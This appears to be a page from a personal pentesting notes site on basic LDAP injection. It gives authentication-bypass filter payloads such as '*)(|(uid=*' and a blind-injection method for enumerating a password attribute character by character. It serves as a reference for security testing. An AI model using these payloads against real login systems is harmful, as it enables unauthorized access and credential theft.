Pentesting
  • API Pentesting
  • Pivoting techniques
  • Aquatone
  • NOSQL injections
  • Basic LDAP Injection
  • Basic authentication bypass
  • SERVER SIDE REQUEST FORGERY (SSRF)
  • SQL injections
  • SSTI
  • Easy - No Protections
  • GENERAL INFORMATION
  • XML External Entity (XXE) Injection Payloads
  • Post exploitation techniques
  • Hashcat Cheatsheet
  • John The Ripper Cheatsheet
  • Cracking files
  • Wordlists & co.
  • WinRM (Windows Remote Management) Pentesting
  • API windows
  • Command find priv /esc
  • Crawl/Fuzz
  • HTTP Request Smuggling
  • Api keys
  • Pivoting, Tunneling, and Port Forwarding
  • Shells & Payloads
  • API Recon
  • API Token Attacks
Powered by GitBook
On this page

Basic LDAP Injection

# Classical request : (&(uid=)(userPassword=)) # So result is TRUE if uid AND userPassword are true # You can put ‘)’ in request to crash and see the request username : *)(|(uid=* password : ) → (&(uid=*)(|(uid=*)(userPassword=))) OR username=* password=*)(& → (&(uid=*)(userPassword=*)(&)) Blind LDAP Injection # You have to find/imagine how is the request built # test using only a char → OK → request is (mail=*[texte]*) # You can try (mail=*)(sn=*) → )(sn= → OK # Then, the password attribute (mail=*)(password=*) → OK @*)(password=x → FALSE @*)(password=d → TRUE # You can the enumerate each char

PreviousNOSQL injectionsNextBasic authentication bypass

Last updated 1 year ago

Page cover image